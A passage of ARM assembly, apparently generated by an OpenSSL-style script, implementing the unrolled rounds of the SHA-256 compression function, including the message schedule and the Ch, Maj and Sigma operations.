@ ldr r2,[r1],#4 @ 1
# if 1==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r7,r7,ror#5
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r7,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 1
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 1==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r7,r7,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r7,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r10,r10,r2 @ h+=X[i]
str r2,[sp,#1*4]
eor r2,r8,r9
add r10,r10,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r7
add r10,r10,r3 @ h+=K256[i]
eor r2,r2,r9 @ Ch(e,f,g)
eor r0,r11,r11,ror#11
add r10,r10,r2 @ h+=Ch(e,f,g)
#if 1==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 1<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r11,r4 @ a^b, b^c in next round
#else
ldr r2,[sp,#3*4] @ from future BODY_16_xx
eor r3,r11,r4 @ a^b, b^c in next round
ldr r1,[sp,#0*4] @ from future BODY_16_xx
#endif
eor r0,r0,r11,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r6,r6,r10 @ d+=h
eor r12,r12,r4 @ Maj(a,b,c)
add r10,r10,r0,ror#2 @ h+=Sigma0(a)
@ add r10,r10,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 2
# if 2==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r6,r6,ror#5
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r6,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 2
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 2==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r6,r6,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r6,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r9,r9,r2 @ h+=X[i]
str r2,[sp,#2*4]
eor r2,r7,r8
add r9,r9,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r6
add r9,r9,r12 @ h+=K256[i]
eor r2,r2,r8 @ Ch(e,f,g)
eor r0,r10,r10,ror#11
add r9,r9,r2 @ h+=Ch(e,f,g)
#if 2==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 2<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r10,r11 @ a^b, b^c in next round
#else
ldr r2,[sp,#4*4] @ from future BODY_16_xx
eor r12,r10,r11 @ a^b, b^c in next round
ldr r1,[sp,#1*4] @ from future BODY_16_xx
#endif
eor r0,r0,r10,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r5,r5,r9 @ d+=h
eor r3,r3,r11 @ Maj(a,b,c)
add r9,r9,r0,ror#2 @ h+=Sigma0(a)
@ add r9,r9,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 3
# if 3==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r5,r5,ror#5
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r5,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 3
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 3==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r5,r5,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r5,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r8,r8,r2 @ h+=X[i]
str r2,[sp,#3*4]
eor r2,r6,r7
add r8,r8,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r5
add r8,r8,r3 @ h+=K256[i]
eor r2,r2,r7 @ Ch(e,f,g)
eor r0,r9,r9,ror#11
add r8,r8,r2 @ h+=Ch(e,f,g)
#if 3==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 3<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r9,r10 @ a^b, b^c in next round
#else
ldr r2,[sp,#5*4] @ from future BODY_16_xx
eor r3,r9,r10 @ a^b, b^c in next round
ldr r1,[sp,#2*4] @ from future BODY_16_xx
#endif
eor r0,r0,r9,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r4,r4,r8 @ d+=h
eor r12,r12,r10 @ Maj(a,b,c)
add r8,r8,r0,ror#2 @ h+=Sigma0(a)
@ add r8,r8,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 4
# if 4==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r4,r4,ror#5
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r4,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 4
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 4==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r4,r4,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r4,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r7,r7,r2 @ h+=X[i]
str r2,[sp,#4*4]
eor r2,r5,r6
add r7,r7,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r4
add r7,r7,r12 @ h+=K256[i]
eor r2,r2,r6 @ Ch(e,f,g)
eor r0,r8,r8,ror#11
add r7,r7,r2 @ h+=Ch(e,f,g)
#if 4==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 4<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r8,r9 @ a^b, b^c in next round
#else
ldr r2,[sp,#6*4] @ from future BODY_16_xx
eor r12,r8,r9 @ a^b, b^c in next round
ldr r1,[sp,#3*4] @ from future BODY_16_xx
#endif
eor r0,r0,r8,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r11,r11,r7 @ d+=h
eor r3,r3,r9 @ Maj(a,b,c)
add r7,r7,r0,ror#2 @ h+=Sigma0(a)
@ add r7,r7,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 5
# if 5==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r11,r11,ror#5
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r11,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 5
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 5==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r11,r11,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r11,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r6,r6,r2 @ h+=X[i]
str r2,[sp,#5*4]
eor r2,r4,r5
add r6,r6,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r11
add r6,r6,r3 @ h+=K256[i]
eor r2,r2,r5 @ Ch(e,f,g)
eor r0,r7,r7,ror#11
add r6,r6,r2 @ h+=Ch(e,f,g)
#if 5==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 5<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r7,r8 @ a^b, b^c in next round
#else
ldr r2,[sp,#7*4] @ from future BODY_16_xx
eor r3,r7,r8 @ a^b, b^c in next round
ldr r1,[sp,#4*4] @ from future BODY_16_xx
#endif
eor r0,r0,r7,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r10,r10,r6 @ d+=h
eor r12,r12,r8 @ Maj(a,b,c)
add r6,r6,r0,ror#2 @ h+=Sigma0(a)
@ add r6,r6,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 6
# if 6==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r10,r10,ror#5
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r10,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 6
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 6==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r10,r10,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r10,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r5,r5,r2 @ h+=X[i]
str r2,[sp,#6*4]
eor r2,r11,r4
add r5,r5,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r10
add r5,r5,r12 @ h+=K256[i]
eor r2,r2,r4 @ Ch(e,f,g)
eor r0,r6,r6,ror#11
add r5,r5,r2 @ h+=Ch(e,f,g)
#if 6==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 6<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r6,r7 @ a^b, b^c in next round
#else
ldr r2,[sp,#8*4] @ from future BODY_16_xx
eor r12,r6,r7 @ a^b, b^c in next round
ldr r1,[sp,#5*4] @ from future BODY_16_xx
#endif
eor r0,r0,r6,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r9,r9,r5 @ d+=h
eor r3,r3,r7 @ Maj(a,b,c)
add r5,r5,r0,ror#2 @ h+=Sigma0(a)
@ add r5,r5,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 7
# if 7==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r9,r9,ror#5
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r9,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 7
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 7==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r9,r9,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r9,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r4,r4,r2 @ h+=X[i]
str r2,[sp,#7*4]
eor r2,r10,r11
add r4,r4,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r9
add r4,r4,r3 @ h+=K256[i]
eor r2,r2,r11 @ Ch(e,f,g)
eor r0,r5,r5,ror#11
add r4,r4,r2 @ h+=Ch(e,f,g)
#if 7==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 7<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r5,r6 @ a^b, b^c in next round
#else
ldr r2,[sp,#9*4] @ from future BODY_16_xx
eor r3,r5,r6 @ a^b, b^c in next round
ldr r1,[sp,#6*4] @ from future BODY_16_xx
#endif
eor r0,r0,r5,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r8,r8,r4 @ d+=h
eor r12,r12,r6 @ Maj(a,b,c)
add r4,r4,r0,ror#2 @ h+=Sigma0(a)
@ add r4,r4,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 8
# if 8==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r8,r8,ror#5
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r8,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 8
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 8==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r8,r8,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r8,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r11,r11,r2 @ h+=X[i]
str r2,[sp,#8*4]
eor r2,r9,r10
add r11,r11,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r8
add r11,r11,r12 @ h+=K256[i]
eor r2,r2,r10 @ Ch(e,f,g)
eor r0,r4,r4,ror#11
add r11,r11,r2 @ h+=Ch(e,f,g)
#if 8==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 8<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r4,r5 @ a^b, b^c in next round
#else
ldr r2,[sp,#10*4] @ from future BODY_16_xx
eor r12,r4,r5 @ a^b, b^c in next round
ldr r1,[sp,#7*4] @ from future BODY_16_xx
#endif
eor r0,r0,r4,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r7,r7,r11 @ d+=h
eor r3,r3,r5 @ Maj(a,b,c)
add r11,r11,r0,ror#2 @ h+=Sigma0(a)
@ add r11,r11,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 9
# if 9==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r7,r7,ror#5
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r7,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 9
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 9==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r7,r7,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r7,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r10,r10,r2 @ h+=X[i]
str r2,[sp,#9*4]
eor r2,r8,r9
add r10,r10,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r7
add r10,r10,r3 @ h+=K256[i]
eor r2,r2,r9 @ Ch(e,f,g)
eor r0,r11,r11,ror#11
add r10,r10,r2 @ h+=Ch(e,f,g)
#if 9==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 9<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r11,r4 @ a^b, b^c in next round
#else
ldr r2,[sp,#11*4] @ from future BODY_16_xx
eor r3,r11,r4 @ a^b, b^c in next round
ldr r1,[sp,#8*4] @ from future BODY_16_xx
#endif
eor r0,r0,r11,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r6,r6,r10 @ d+=h
eor r12,r12,r4 @ Maj(a,b,c)
add r10,r10,r0,ror#2 @ h+=Sigma0(a)
@ add r10,r10,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 10
# if 10==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r6,r6,ror#5
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r6,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 10
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 10==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r6,r6,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r6,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r9,r9,r2 @ h+=X[i]
str r2,[sp,#10*4]
eor r2,r7,r8
add r9,r9,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r6
add r9,r9,r12 @ h+=K256[i]
eor r2,r2,r8 @ Ch(e,f,g)
eor r0,r10,r10,ror#11
add r9,r9,r2 @ h+=Ch(e,f,g)
#if 10==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 10<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r10,r11 @ a^b, b^c in next round
#else
ldr r2,[sp,#12*4] @ from future BODY_16_xx
eor r12,r10,r11 @ a^b, b^c in next round
ldr r1,[sp,#9*4] @ from future BODY_16_xx
#endif
eor r0,r0,r10,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r5,r5,r9 @ d+=h
eor r3,r3,r11 @ Maj(a,b,c)
add r9,r9,r0,ror#2 @ h+=Sigma0(a)
@ add r9,r9,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 11
# if 11==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r5,r5,ror#5
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r5,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 11
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 11==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r5,r5,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r5,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r8,r8,r2 @ h+=X[i]
str r2,[sp,#11*4]
eor r2,r6,r7
add r8,r8,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r5
add r8,r8,r3 @ h+=K256[i]
eor r2,r2,r7 @ Ch(e,f,g)
eor r0,r9,r9,ror#11
add r8,r8,r2 @ h+=Ch(e,f,g)
#if 11==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 11<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r9,r10 @ a^b, b^c in next round
#else
ldr r2,[sp,#13*4] @ from future BODY_16_xx
eor r3,r9,r10 @ a^b, b^c in next round
ldr r1,[sp,#10*4] @ from future BODY_16_xx
#endif
eor r0,r0,r9,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r4,r4,r8 @ d+=h
eor r12,r12,r10 @ Maj(a,b,c)
add r8,r8,r0,ror#2 @ h+=Sigma0(a)
@ add r8,r8,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 12
# if 12==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r4,r4,ror#5
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r4,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 12
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 12==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r4,r4,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r4,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r7,r7,r2 @ h+=X[i]
str r2,[sp,#12*4]
eor r2,r5,r6
add r7,r7,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r4
add r7,r7,r12 @ h+=K256[i]
eor r2,r2,r6 @ Ch(e,f,g)
eor r0,r8,r8,ror#11
add r7,r7,r2 @ h+=Ch(e,f,g)
#if 12==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 12<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r8,r9 @ a^b, b^c in next round
#else
ldr r2,[sp,#14*4] @ from future BODY_16_xx
eor r12,r8,r9 @ a^b, b^c in next round
ldr r1,[sp,#11*4] @ from future BODY_16_xx
#endif
eor r0,r0,r8,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r11,r11,r7 @ d+=h
eor r3,r3,r9 @ Maj(a,b,c)
add r7,r7,r0,ror#2 @ h+=Sigma0(a)
@ add r7,r7,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 13
# if 13==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r11,r11,ror#5
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r11,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 13
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 13==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r11,r11,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r11,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r6,r6,r2 @ h+=X[i]
str r2,[sp,#13*4]
eor r2,r4,r5
add r6,r6,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r11
add r6,r6,r3 @ h+=K256[i]
eor r2,r2,r5 @ Ch(e,f,g)
eor r0,r7,r7,ror#11
add r6,r6,r2 @ h+=Ch(e,f,g)
#if 13==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 13<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r7,r8 @ a^b, b^c in next round
#else
ldr r2,[sp,#15*4] @ from future BODY_16_xx
eor r3,r7,r8 @ a^b, b^c in next round
ldr r1,[sp,#12*4] @ from future BODY_16_xx
#endif
eor r0,r0,r7,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r10,r10,r6 @ d+=h
eor r12,r12,r8 @ Maj(a,b,c)
add r6,r6,r0,ror#2 @ h+=Sigma0(a)
@ add r6,r6,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 14
# if 14==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r10,r10,ror#5
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r10,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 14
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 14==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r10,r10,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r10,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r5,r5,r2 @ h+=X[i]
str r2,[sp,#14*4]
eor r2,r11,r4
add r5,r5,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r10
add r5,r5,r12 @ h+=K256[i]
eor r2,r2,r4 @ Ch(e,f,g)
eor r0,r6,r6,ror#11
add r5,r5,r2 @ h+=Ch(e,f,g)
#if 14==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 14<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r6,r7 @ a^b, b^c in next round
#else
ldr r2,[sp,#0*4] @ from future BODY_16_xx
eor r12,r6,r7 @ a^b, b^c in next round
ldr r1,[sp,#13*4] @ from future BODY_16_xx
#endif
eor r0,r0,r6,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r9,r9,r5 @ d+=h
eor r3,r3,r7 @ Maj(a,b,c)
add r5,r5,r0,ror#2 @ h+=Sigma0(a)
@ add r5,r5,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 15
# if 15==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r9,r9,ror#5
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r9,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 15
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 15==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r9,r9,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r9,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r4,r4,r2 @ h+=X[i]
str r2,[sp,#15*4]
eor r2,r10,r11
add r4,r4,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r9
add r4,r4,r3 @ h+=K256[i]
eor r2,r2,r11 @ Ch(e,f,g)
eor r0,r5,r5,ror#11
add r4,r4,r2 @ h+=Ch(e,f,g)
#if 15==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 15<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r5,r6 @ a^b, b^c in next round
#else
ldr r2,[sp,#1*4] @ from future BODY_16_xx
eor r3,r5,r6 @ a^b, b^c in next round
ldr r1,[sp,#14*4] @ from future BODY_16_xx
#endif
eor r0,r0,r5,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r8,r8,r4 @ d+=h
eor r12,r12,r6 @ Maj(a,b,c)
add r4,r4,r0,ror#2 @ h+=Sigma0(a)
@ add r4,r4,r12 @ h+=Maj(a,b,c)
.Lrounds_16_xx:
@ ldr r2,[sp,#1*4] @ 16
@ ldr r1,[sp,#14*4]
mov r0,r2,ror#7
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#0*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#9*4]
add r12,r12,r0
eor r0,r8,r8,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r8,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r11,r11,r2 @ h+=X[i]
str r2,[sp,#0*4]
eor r2,r9,r10
add r11,r11,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r8
add r11,r11,r12 @ h+=K256[i]
eor r2,r2,r10 @ Ch(e,f,g)
eor r0,r4,r4,ror#11
add r11,r11,r2 @ h+=Ch(e,f,g)
#if 16==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 16<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r4,r5 @ a^b, b^c in next round
#else
ldr r2,[sp,#2*4] @ from future BODY_16_xx
eor r12,r4,r5 @ a^b, b^c in next round
ldr r1,[sp,#15*4] @ from future BODY_16_xx
#endif
eor r0,r0,r4,ror#20 @ Sigma0(a)
